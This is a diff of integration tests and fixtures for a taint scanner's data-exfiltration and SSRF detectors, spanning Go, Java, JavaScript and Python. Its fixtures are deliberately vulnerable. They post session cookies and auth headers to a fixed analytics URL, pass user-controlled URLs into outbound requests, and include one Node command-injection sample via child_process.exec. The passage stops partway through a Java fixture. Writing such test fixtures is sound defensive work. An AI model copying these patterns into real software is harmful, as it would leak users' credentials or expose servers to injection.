// hardcoded body; SSRF must fire on the URL flow and DATA_EXFIL
// must NOT fire (no Sensitive source reaches the body).
let diags = diags_for("ssrf_url_tainted.go");
let ssrf = diags
.iter()
.filter(|d| d.id.starts_with("taint-unsanitised-flow"))
.count();
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
assert!(
ssrf >= 1,
"expected at least one taint-unsanitised-flow (SSRF) finding, got 0.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
assert_eq!(
exfil,
0,
"tainted-URL NewRequest → Do must NOT emit DATA_EXFIL, got {exfil}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn http_post_plain_user_input_does_not_emit_data_exfil() {
// Plain attacker-controlled input (`r.FormValue`) flowing into a
// fixed-URL `http.Post` body must NOT fire `Cap::DATA_EXFIL` after
// the source-sensitivity gate strips the cap for Plain sources.
let diags = diags_for("data_exfil_user_input_silenced.go");
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
assert_eq!(
exfil,
0,
"plain user input echoed into a Go http.Post body must NOT emit \
taint-data-exfiltration, got {exfil}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn cross_file_go_data_exfil_split() {
// A wrapper whose two parameters target distinct gated-sink classes
// on a single inner two-step (`url` flows to NewRequest's SSRF gate;
// `body` flows through NewRequest → Do's DATA_EXFIL gate). Each
// caller taints exactly one parameter and must surface only the cap
// class corresponding to that parameter's gate.
let dir = Path::new(env!("CARGO_MANIFEST_DIR"))
.join("tests")
.join("fixtures")
.join("cross_file_go_data_exfil");
let diags = scan_fixture_dir(&dir, AnalysisMode::Full);
validate_expectations(&diags, &dir);
}

View file

@ -0,0 +1,138 @@
//! Integration tests for the Java bindings of the `Cap::DATA_EXFIL`
//! detector class.
//!
//! Mirrors the JS `fetch_data_exfil_integration_tests` and Go
//! `data_exfil_go_integration_tests` shapes. Each chained-API HTTP
//! client (java.net.http, Spring RestTemplate / WebClient, OkHttp,
//! Apache HttpClient) gets its own fixture: a Sensitive source flows
//! through the body-binding chain into a fixed-URL outbound call, and
//! the regression fixture proves SSRF still fires on a tainted URL
//! without leaking into DATA_EXFIL.
//!
//! Body-binding chain propagators (`BodyPublishers.ofString`,
//! `RequestBody.create`, `StringEntity` ctor, builder `.uri()` /
//! `.POST()` / `.bodyValue()`) carry taint through the chain via the
//! transfer engine's default arg → return smear, so no per-callee
//! propagator rules are needed; the sink at the network call sees the
//! end-of-chain request value carrying body taint.
mod common;
use common::scan_fixture_dir;
use nyx_scanner::commands::scan::Diag;
use nyx_scanner::utils::config::AnalysisMode;
use std::path::PathBuf;
fn java_fixture_dir() -> PathBuf {
PathBuf::from(env!("CARGO_MANIFEST_DIR"))
.join("tests")
.join("fixtures")
.join("java")
}
fn diags_for(file: &str) -> Vec<Diag> {
let dir = java_fixture_dir();
let all = scan_fixture_dir(&dir, AnalysisMode::Full);
all.into_iter().filter(|d| d.path.ends_with(file)).collect()
}
fn assert_data_exfil_fires_no_ssrf(file: &str) {
let diags = diags_for(file);
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
let plain_taint = diags
.iter()
.filter(|d| d.id.starts_with("taint-unsanitised-flow"))
.count();
assert!(
exfil >= 1,
"{file}: expected at least one taint-data-exfiltration finding, got 0.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
assert_eq!(
plain_taint,
0,
"{file}: fixed-URL call with tainted body must NOT emit SSRF \
(taint-unsanitised-flow), got {plain_taint}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn jdk_http_client_chain_emits_data_exfil_not_ssrf() {
// java.net.http: cookie → BodyPublishers.ofString → builder chain →
// client.send(req). Type-qualified resolution rewrites
// client.send → HttpClient.send so the new flat DATA_EXFIL rule
// and the existing flat SSRF rule both attach; only DATA_EXFIL
// should surface because the URL is hardcoded.
assert_data_exfil_fires_no_ssrf("data_exfil_jdk_httpclient.java");
}
#[test]
fn rest_template_post_for_object_emits_data_exfil_not_ssrf() {
// Spring RestTemplate: header → restTemplate.postForObject(url,
// body, type). RestTemplate subtypes HttpClient via the
// JAVA_HIERARCHY so type-qualified resolution finds the same flat
// rule that the JDK client uses.
assert_data_exfil_fires_no_ssrf("data_exfil_resttemplate.java");
}
#[test]
fn web_client_body_value_emits_data_exfil_not_ssrf() {
// Spring WebClient: env var → webClient.post().uri(u).bodyValue(p)
// .retrieve(). The body-bind step `bodyValue` carries a flat
// DATA_EXFIL sink rule — a bare-name suffix matcher independent of
// receiver typing, since the chain receiver type is RequestBodySpec.
assert_data_exfil_fires_no_ssrf("data_exfil_webclient.java");
}
#[test]
fn ok_http_new_call_execute_emits_data_exfil_not_ssrf() {
// OkHttp two-step: session attribute → RequestBody.create →
// builder chain → client.newCall(req).execute(). Chain
// normalization strips `()` between dots so the suffix
// `newCall.execute` matches.
assert_data_exfil_fires_no_ssrf("data_exfil_okhttp.java");
}
#[test]
fn apache_http_client_execute_emits_data_exfil_not_ssrf() {
// Apache HttpClient: cookie → StringEntity → HttpPost.setEntity →
// httpClient.execute(req). CloseableHttpClient subtypes HttpClient
// so type-qualified resolution rewrites client.execute →
// HttpClient.execute and reuses the same flat rule.
assert_data_exfil_fires_no_ssrf("data_exfil_apache_httpclient.java");
}
#[test]
fn ssrf_url_only_emits_ssrf_not_data_exfil() {
// Tainted URL with hardcoded body: SSRF must fire on the URL flow,
// DATA_EXFIL must NOT fire because no Sensitive source reaches the
// body. Guards against the new flat DATA_EXFIL rule over-firing.
let diags = diags_for("ssrf_url_only_no_data_exfil.java");
let ssrf = diags
.iter()
.filter(|d| d.id.starts_with("taint-unsanitised-flow"))
.count();
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
assert!(
ssrf >= 1,
"expected at least one taint-unsanitised-flow (SSRF) finding, got 0.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
assert_eq!(
exfil,
0,
"tainted-URL HttpClient.send must NOT emit DATA_EXFIL, got {exfil}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}

View file

@ -38,12 +38,17 @@ fn test_cfg() -> Config {
}
fn seed_project(root: &Path) {
// Use the qualified `child_process.exec` form so the seed produces a
// taint finding under the post-fix label rules (bare `exec` as a flat
// sink was removed because it suffix-matched any `<recv>.exec`, e.g.
// Dockerode `container.exec`). The qualified form is the canonical
// Node.js stdlib path and stays a flat sink.
std::fs::write(
root.join("cmdi.js"),
b"const cp = require('child_process');\n\
b"const child_process = require('child_process');\n\
const express = require('express');\n\
const app = express();\n\
app.get('/x', (req, res) => { cp.exec(req.query.cmd); res.send('ok'); });\n",
app.get('/x', (req, res) => { child_process.exec(req.query.cmd); res.send('ok'); });\n",
)
.unwrap();
}

View file

@ -5,6 +5,12 @@
//! headers / json flow), and a tainted body must not surface as SSRF and
//! vice versa. Also sanity-checks the SARIF output so the new finding
//! class produces a distinct rule id.
//!
//! `DATA_EXFIL` is gated on source sensitivity: only `Sensitive`-tier
//! sources (cookies, headers, env, db rows, file reads) trigger the cap.
//! Plain user input echoed back into a body is *not* data exfiltration —
//! the user already controls the value. See
//! `fetch_body_user_input_silenced.js` for the negative regression.
mod common;
@ -79,6 +85,87 @@ fn fetch_ssrf_url_tainted_emits_ssrf_not_data_exfil() {
);
}
#[test]
fn fetch_body_plain_user_input_does_not_emit_data_exfil() {
// Plain attacker-controlled input (`req.body.message`) flowing into a
// fixed-URL `fetch` body must NOT fire `Cap::DATA_EXFIL` after the
// source-sensitivity gate. The user already controls the value;
// surfacing it back to the user via the outbound payload is not a
// cross-boundary disclosure.
let diags = diags_for("fetch_body_user_input_silenced.js");
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
assert_eq!(
exfil,
0,
"plain user input echoed into a fetch body must NOT emit \
taint-data-exfiltration, got {exfil}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn fetch_body_data_exfil_witness_mentions_session_token() {
// Symex-witness regression guard: a DATA_EXFIL `Confirmed` (or
// Inconclusive but witness-bearing) verdict on the cookie → fetch
// body fixture must surface the session-token payload in its
// witness string. The cap-specific payload selector in
// `src/symex/witness.rs::witness_payload` returns
// `<SESSION_TOKEN>` for `Cap::DATA_EXFIL`, the rendered witness
// (via `get_sink_witness`) substitutes that into the
// string-renderable expression so the analyst sees that the *leak*
// is a credential-bearing payload, not an injection.
//
// When symex emits no witness for this flow (e.g. the expression
// tree was opaque) the test silently accepts that, the assertion
// is one-sided so the witness shape is locked but witness absence
// is not promoted to a hard failure (the calibration suite
// already covers the no-witness path).
let diags = diags_for("fetch_body_data_exfil.js");
let exfil_witnesses: Vec<&String> = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.filter_map(|d| {
d.evidence
.as_ref()
.and_then(|e| e.symbolic.as_ref())
.and_then(|sv| sv.witness.as_ref())
})
.collect();
for w in &exfil_witnesses {
assert!(
w.contains("<SESSION_TOKEN>") || w.contains("body") || w.contains("payload"),
"DATA_EXFIL witness must mention the leaked payload \
(<SESSION_TOKEN>) or body/payload context. Got: {w:?}",
);
}
}
#[test]
fn fetch_body_int_value_does_not_emit_data_exfil() {
// Numeric-typed bodies (e.g. `parseInt(req.cookies.session_count)`)
// are payload-incompatible: ints cannot carry session tokens, header
// secrets, or any credential material that constitutes a
// cross-boundary disclosure. `is_type_safe_for_sink` lists
// `DATA_EXFIL` in its type-suppressible cap mask so a proven-Int SSA
// value at the gate silences the finding.
let diags = diags_for("fetch_body_int_suppressed.js");
let exfil = diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count();
assert_eq!(
exfil,
0,
"int-typed body must NOT emit taint-data-exfiltration, got {exfil}.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
}
#[test]
fn sarif_distinguishes_data_exfil_rule_id_from_ssrf() {
use nyx_scanner::output::build_sarif;
@ -106,20 +193,35 @@ fn sarif_distinguishes_data_exfil_rule_id_from_ssrf() {
let results = sarif["runs"][0]["results"]
.as_array()
.expect("SARIF results array");
let exfil_results = results
let exfil_results: Vec<&serde_json::Value> = results
.iter()
.filter(|r| r["ruleId"].as_str() == Some("taint-data-exfiltration"))
.count();
.collect();
let ssrf_results = results
.iter()
.filter(|r| r["ruleId"].as_str() == Some("taint-unsanitised-flow"))
.count();
assert!(
exfil_results >= 1,
"expected >= 1 SARIF result with ruleId taint-data-exfiltration, got {exfil_results}",
!exfil_results.is_empty(),
"expected >= 1 SARIF result with ruleId taint-data-exfiltration, got {}",
exfil_results.len(),
);
assert!(
ssrf_results >= 1,
"expected >= 1 SARIF result with ruleId taint-unsanitised-flow, got {ssrf_results}",
);
// Every DATA_EXFIL finding from the fixture set targets the request body
// (`fetch('/endpoint', { body: payload })`), so SARIF must surface the
// destination field via `properties.data_exfil_field`. At least one
// result has to advertise `body`, fixtures that reach `headers` /
// `json` are out of scope for this assertion but must not be silenced.
let body_field_seen = exfil_results
.iter()
.any(|r| r["properties"]["data_exfil_field"].as_str() == Some("body"));
assert!(
body_field_seen,
"expected at least one taint-data-exfiltration SARIF result with \
properties.data_exfil_field == \"body\". Results: {exfil_results:#?}",
);
}

View file

@ -0,0 +1,142 @@
//! `Cap::DATA_EXFIL` suppression-layer integration tests.
//!
//! Three layers are exercised:
//!
//! 1. Sanitizer convention. `logEvent({user: req.cookies.session})`
//! routes a Sensitive cookie source through a named telemetry
//! boundary; the default sanitizer rule for `logEvent` clears the
//! cap.
//! 2. Per-project destination allowlist. With
//! `detectors.data_exfil.trusted_destinations = ["https://api.internal/"]`
//! installed via the runtime, a `fetch('https://api.internal/...',
//! {body: tainted})` call has the cap suppressed for that gate only;
//! a `fetch('https://untrusted.example.com/...', ...)` call on a
//! destination NOT in the allowlist still emits the finding.
//! 3. Detector-class enabled toggle. When
//! `detectors.data_exfil.enabled = false` is installed, no
//! `taint-data-exfiltration` finding is emitted regardless of which
//! gate would have fired.
//!
//! All sub-cases run inside a single `#[test]` so the global
//! `detector_options` runtime is mutated sequentially. Each sub-case
//! installs its own configuration via `reinstall` and resets to defaults
//! at the end so other test binaries are unaffected.
mod common;
use common::scan_fixture_dir;
use nyx_scanner::commands::scan::Diag;
use nyx_scanner::utils::config::AnalysisMode;
use nyx_scanner::utils::detector_options::{DataExfilDetectorOptions, DetectorOptions, reinstall};
use std::path::PathBuf;
fn js_fixture_dir() -> PathBuf {
PathBuf::from(env!("CARGO_MANIFEST_DIR"))
.join("tests")
.join("fixtures")
.join("js")
}
fn diags_for(file: &str) -> Vec<Diag> {
let dir = js_fixture_dir();
let all = scan_fixture_dir(&dir, AnalysisMode::Full);
all.into_iter().filter(|d| d.path.ends_with(file)).collect()
}
fn count_data_exfil(diags: &[Diag]) -> usize {
diags
.iter()
.filter(|d| d.id.starts_with("taint-data-exfiltration"))
.count()
}
fn install_default_detectors() {
reinstall(DetectorOptions::default());
}
fn install_with_trusted(prefixes: &[&str]) {
reinstall(DetectorOptions {
data_exfil: DataExfilDetectorOptions {
enabled: true,
trusted_destinations: prefixes.iter().map(|s| (*s).to_string()).collect(),
},
});
}
fn install_disabled() {
reinstall(DetectorOptions {
data_exfil: DataExfilDetectorOptions {
enabled: false,
trusted_destinations: Vec::new(),
},
});
}
#[test]
fn data_exfil_suppression_suite() {
// ── 1. sanitizer-convention: `logEvent` clears the cap.
install_default_detectors();
let diags = diags_for("fetch_data_exfil_sanitizer_wrap.js");
assert_eq!(
count_data_exfil(&diags),
0,
"logEvent default sanitizer must clear DATA_EXFIL.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
// ── 2a. allowlist drops cap on trusted destination.
install_with_trusted(&["https://api.internal/"]);
let diags = diags_for("fetch_data_exfil_allowlist_suppressed.js");
assert_eq!(
count_data_exfil(&diags),
0,
"trusted destination prefix must drop DATA_EXFIL for that filter.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
// ── 2b. negative: a destination NOT in the allowlist still fires.
install_with_trusted(&["https://api.internal/"]);
let diags = diags_for("fetch_data_exfil_external_destination.js");
assert!(
count_data_exfil(&diags) >= 1,
"destination not in allowlist must still emit DATA_EXFIL.\n\
Diags: {:#?}",
diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
);
// ── 3a. detector toggle off ⇒ no DATA_EXFIL anywhere.
install_disabled();
let diags_internal = diags_for("fetch_data_exfil_allowlist_suppressed.js");
let diags_external = diags_for("fetch_data_exfil_external_destination.js");
let diags_classic = diags_for("fetch_body_data_exfil.js");
assert_eq!(
count_data_exfil(&diags_internal),
0,
"enabled=false must suppress DATA_EXFIL on the internal-destination fixture",
);
assert_eq!(
count_data_exfil(&diags_external),
0,
"enabled=false must suppress DATA_EXFIL on the external-destination fixture",
);
assert_eq!(
count_data_exfil(&diags_classic),
0,
"enabled=false must suppress DATA_EXFIL on the original cookie-leak fixture",
);
// ── 3b. re-enable ⇒ classic cookie-leak fixture fires again
// (regression guard for the toggle).
install_default_detectors();
let diags_classic = diags_for("fetch_body_data_exfil.js");
assert!(
count_data_exfil(&diags_classic) >= 1,
"after re-enabling, the classic cookie-leak fixture must emit DATA_EXFIL again",
);
// Reset to defaults so other test binaries running later in the same
// process pick up the documented baseline.
install_default_detectors();
}

View file

@ -0,0 +1,16 @@
var express = require('express');
var { forward } = require('./helper');
var app = express();
// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
// session cookie is a Sensitive-tier source, so taint carries the
// DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT
// fire — the URL is a hardcoded literal and the cap-vs-position split
// keeps the body's taint from leaking onto the URL's gate.
app.get('/sync', function(req, res) {
var sid = req.cookies.session;
var payload = JSON.stringify({ session: sid });
forward('https://analytics.internal/track', payload);
res.status(204).end();
});

View file

@ -0,0 +1,14 @@
var express = require('express');
var { forward } = require('./helper');
var app = express();
// Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL
// must NOT fire — the body is a literal string, not a sensitive source,
// and the cap-vs-position split through the wrapper's summary keeps the
// URL's taint from leaking onto the body's gate.
app.get('/proxy', function(req, res) {
var taintedUrl = req.query.url;
forward(taintedUrl, '{"ok":true}');
res.status(204).end();
});

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.js"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.js"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,10 @@
// Wrapper around `fetch` whose two parameters target distinct gated-sink
// classes on the inner call: `url` is the SSRF gate's destination; `body`
// is the DATA_EXFIL gate's payload. Pass-1 SSA summary extraction lifts
// the per-position cap split into `param_to_gate_filters` so cross-file
// callers can attribute SSRF vs DATA_EXFIL per argument.
function forward(url, body) {
fetch(url, { method: 'POST', body: body });
}
module.exports = { forward };

View file

@ -0,0 +1,17 @@
// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
// session cookie is a Sensitive-tier source, so taint carries the
// DATA_EXFIL bit through to the wrapper's Do gate. SSRF must NOT fire —
// the URL is a hardcoded literal and per-position cap attribution keeps
// the body's taint from leaking onto the URL's gate.
package fixture
import (
"net/http"
"strings"
)
func SyncCookie(r *http.Request) {
c, _ := r.Cookie("session")
body := strings.NewReader(c.Value)
Forward("https://analytics.internal/track", body)
}

View file

@ -0,0 +1,16 @@
// Tainted URL, hardcoded body: SSRF must fire on the URL flow. The
// query param is a `Plain` user-input source, so even though it carries
// `Cap::all()` upstream the source-sensitivity gate strips DATA_EXFIL
// for plain inputs. Only SSRF survives.
package fixture
import (
"net/http"
"strings"
)
func ProxyTarget(r *http.Request) {
target := r.URL.Query().Get("target")
body := strings.NewReader("hardcoded")
Forward(target, body)
}

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.go"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.go"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,16 @@
// Wrapper whose two parameters target distinct gated-sink classes on the
// inner call: `url` is the SSRF gate's destination at `http.Post`'s
// arg 0; `body` is the DATA_EXFIL gate's payload at arg 2. Pass-1 SSA
// summary extraction lifts the per-position cap split into
// `param_to_gate_filters` so cross-file callers attribute SSRF vs
// DATA_EXFIL per argument.
package fixture
import (
"io"
"net/http"
)
func Forward(url string, body io.Reader) {
http.Post(url, "text/plain", body)
}

View file

@ -0,0 +1,18 @@
"""Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
session cookie is a Sensitive-tier source, so taint carries the
DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT fire —
the URL is a hardcoded literal and the cap-vs-position split keeps the
body's taint from leaking onto the URL's gate.
"""
from flask import Flask, session
from helper import forward
app = Flask(__name__)
@app.route('/sync')
def sync():
sid = session.get('user_token')
forward('https://analytics.internal/track', {'session': sid})
return '', 204

View file

@ -0,0 +1,17 @@
"""Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL
must NOT fire the body is a literal dict, not a sensitive source, and
the cap-vs-position split through the wrapper's summary keeps the URL's
taint from leaking onto the body's gate.
"""
from flask import Flask, request
from helper import forward
app = Flask(__name__)
@app.route('/proxy', methods=['POST'])
def proxy():
tainted_url = request.args.get('url')
forward(tainted_url, {'event': 'proxy_call'})
return '', 204

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.py"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.py"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,12 @@
"""Wrapper around requests.post whose two parameters target distinct
gated-sink classes on the inner call: `url` is the SSRF gate's destination
(arg 0); `body` is the DATA_EXFIL gate's payload (json kwarg). Pass-1 SSA
summary extraction lifts the per-position cap split into
`param_to_gate_filters` so cross-file callers can attribute SSRF vs
DATA_EXFIL per argument.
"""
import requests
def forward(url, body):
requests.post(url, json=body)

View file

@ -0,0 +1,20 @@
"""demand_driven_data_exfil.
`Cap::DATA_EXFIL` parity for the backwards-analysis pass. The forward
engine emits a `taint-data-exfiltration` finding for the cookie
fetch-body flow (Sensitive source, fixed destination URL). With
`backwards_analysis = true`, the post-pass must walk backwards from the
DATA_EXFIL sink demand, reach the cookie source, and annotate the
finding with `backwards-confirmed`. Validates that the cap-routing
logic in `taint/backwards.rs::DemandState` round-trips bit 13
(DATA_EXFIL) identically to the SQL/CMD/SSRF caps the rest of the
demand-driven suite covers.
"""
import requests
from flask import request
def forward_session():
sid = request.cookies.get("session")
requests.post("https://analytics.internal/track", json={"session": sid})

View file

@ -0,0 +1,16 @@
{
"required_findings": [
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [],
"noise_budget": {
"max_total_findings": 4,
"max_high_findings": 2
},
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,19 @@
// DATA_EXFIL fixture: a fixed destination URL and a Sensitive (cookie)
// source flowing into the outbound body of `http.Post`. SSRF must NOT
// fire (URL is hardcoded, position 0) but `Cap::DATA_EXFIL` must fire on
// the body (position 2) — the auth cookie is exactly the cross-boundary
// state DATA_EXFIL targets.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func leakCookie(r *http.Request) {
c, _ := r.Cookie("session")
body := strings.NewReader(c.Value)
http.Post("https://analytics.internal/track", "text/plain", body)
}

View file

@ -0,0 +1,27 @@
// Container-taint DATA_EXFIL: a `map[string]string` is populated with
// Sensitive cookie values across two keys, then encoded as form data and
// shipped as the body of an outbound `http.PostForm`. The Go SSA heap
// model marks the map's `Elements` slot tainted on every `payload[k] =
// ...` write; the sink-side `collect_tainted_sink_values` heap-loads
// the same slot when checking the form-data argument, so DATA_EXFIL
// must fire on the body channel even though the local map name itself
// is not directly tainted by an Assign. Pairs with
// `data_exfil_post_form.go` (single-write `url.Values` literal — no
// container-mutation step).
//
// Driven by `data_exfil_go_integration_tests.rs::map_assign_data_exfil`.
package fixture
import (
"net/http"
"net/url"
)
func leakSessionMap(r *http.Request) {
c, _ := r.Cookie("session")
a, _ := r.Cookie("auth")
form := url.Values{}
form["session"] = []string{c.Value}
form["auth"] = []string{a.Value}
http.PostForm("https://analytics.internal/track", form)
}

View file

@ -0,0 +1,24 @@
// DATA_EXFIL fixture for the two-step `http.NewRequest` → `client.Do`
// idiom. `http.NewRequest` is modeled as a body propagator (default
// arg → return propagation lifts body taint onto the returned
// `*http.Request`); the outbound network call happens at
// `http.DefaultClient.Do`, where the DATA_EXFIL gate fires on the
// request argument.
//
// SSRF must NOT fire (URL is hardcoded at NewRequest's URL position) and
// the cookie-derived body must surface DATA_EXFIL at the Do call.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func leakViaNewRequest(r *http.Request) {
c, _ := r.Cookie("session")
body := strings.NewReader(c.Value)
req, _ := http.NewRequest("POST", "https://analytics.internal/track", body)
http.DefaultClient.Do(req)
}

View file

@ -0,0 +1,18 @@
// DATA_EXFIL fixture: a Sensitive (header) source flowing into the form
// payload of `http.PostForm` (arg 1, `url.Values`). The destination URL
// is hardcoded so SSRF does not fire; only the form-data path activates
// the body-position gate.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"net/url"
)
func leakAuthHeader(r *http.Request) {
auth := r.Header.Get("Authorization")
form := url.Values{"token": []string{auth}}
http.PostForm("https://analytics.internal/track", form)
}

View file

@ -0,0 +1,19 @@
// DATA_EXFIL silenced regression fixture: plain user input echoed into
// the body of an outbound `http.Post` to a fixed URL must NOT fire
// `Cap::DATA_EXFIL`. The user already controls `r.FormValue("msg")`, so
// surfacing it back into the request payload is not a cross-boundary
// disclosure. Source-sensitivity gating in `ast.rs` strips the cap.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
"strings"
)
func forwardUserInput(r *http.Request) {
msg := r.FormValue("msg")
body := strings.NewReader(msg)
http.Post("https://analytics.internal/track", "text/plain", body)
}

18
tests/fixtures/go/ssrf_url_tainted.go vendored Normal file
View file

@ -0,0 +1,18 @@
// SSRF regression fixture: attacker-controlled destination URL flows
// into `http.NewRequest`'s URL position (arg 1). SSRF must fire on the
// URL flow; DATA_EXFIL must NOT fire (the body is hardcoded `nil`).
// Cap attribution is per-position so a tainted URL never surfaces as
// data exfiltration.
//
// Driven by `data_exfil_go_integration_tests.rs`.
package fixture
import (
"net/http"
)
func proxy(r *http.Request) {
target := r.URL.Query().Get("target")
req, _ := http.NewRequest("GET", target, nil)
http.DefaultClient.Do(req)
}

View file

@ -0,0 +1,27 @@
// DATA_EXFIL fixture: Apache HttpClient. A request cookie (Sensitive)
// is wrapped in a StringEntity (default smear) and attached to an
// HttpPost via setEntity (also default smear). The network call
// happens at `httpClient.execute(req)`, which type-qualified resolution
// rewrites to `HttpClient.execute` via JAVA_HIERARCHY
// (CloseableHttpClient subtypes HttpClient). SSRF must NOT fire (URL
// is a hardcoded constant on the HttpPost ctor).
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
import org.apache.http.HttpResponse;
import org.apache.http.client.methods.HttpPost;
import org.apache.http.entity.StringEntity;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
public class DataExfilApacheHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies();
String session = cookies[0].getValue();
CloseableHttpClient httpClient = HttpClients.createDefault();
HttpPost req = new HttpPost("https://analytics.internal/track");
req.setEntity(new StringEntity(session));
HttpResponse resp = httpClient.execute(req);
}
}

View file

@ -0,0 +1,28 @@
// DATA_EXFIL fixture: java.net.http chain. A Sensitive source (cookie)
// flows through `BodyPublishers.ofString(payload)` and the request
// builder chain into `client.send(req)` at a hardcoded URL. SSRF must
// NOT fire (URL is a fixed string) and `Cap::DATA_EXFIL` must fire
// because the cookie is exactly the cross-boundary state the cap
// targets.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpRequest.BodyPublishers;
import java.net.http.HttpResponse.BodyHandlers;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletRequest;
public class DataExfilJdkHttpClient {
public void leak(HttpServletRequest request) throws Exception {
Cookie[] cookies = request.getCookies();
String session = cookies[0].getValue();
HttpClient client = HttpClient.newHttpClient();
HttpRequest req = HttpRequest.newBuilder()
.uri(URI.create("https://analytics.internal/track"))
.POST(BodyPublishers.ofString(session))
.build();
client.send(req, BodyHandlers.ofString());
}
}

View file

@ -0,0 +1,28 @@
// DATA_EXFIL fixture: OkHttp two-step. A session attribute (Sensitive)
// is wrapped via `RequestBody.create` (default arg return smear)
// and bound to the request via the builder chain. The network call
// happens at `client.newCall(req).execute()` which hits the
// chain-normalized `newCall.execute` matcher. SSRF must NOT fire on
// the hardcoded URL.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.HttpSession;
import okhttp3.MediaType;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.RequestBody;
import okhttp3.Response;
public class DataExfilOkHttp {
public void leak(HttpSession session) throws Exception {
String token = (String) session.getAttribute("csrfToken");
OkHttpClient client = new OkHttpClient();
RequestBody body = RequestBody.create(
token, MediaType.parse("text/plain"));
Request req = new Request.Builder()
.url("https://analytics.internal/track")
.post(body)
.build();
Response resp = client.newCall(req).execute();
}
}

View file

@ -0,0 +1,23 @@
// DATA_EXFIL fixture: Spring RestTemplate. An HTTP header value (a
// Sensitive source) flows directly into the request body of
// `restTemplate.postForObject(url, body, type)`. The destination URL
// is hardcoded so SSRF must NOT fire. `Cap::DATA_EXFIL` must fire on
// the body position. Type-qualified resolution rewrites
// `restTemplate.postForObject` `HttpClient.postForObject` via the
// JAVA_HIERARCHY (RestTemplate subtypes HttpClient), reusing the same
// flat sink rule the JDK client uses.
//
// Driven by `data_exfil_java_integration_tests.rs`.
import javax.servlet.http.HttpServletRequest;
import org.springframework.web.client.RestTemplate;
public class DataExfilRestTemplate {
public void leak(HttpServletRequest request) {
String authHeader = request.getHeader("Authorization");
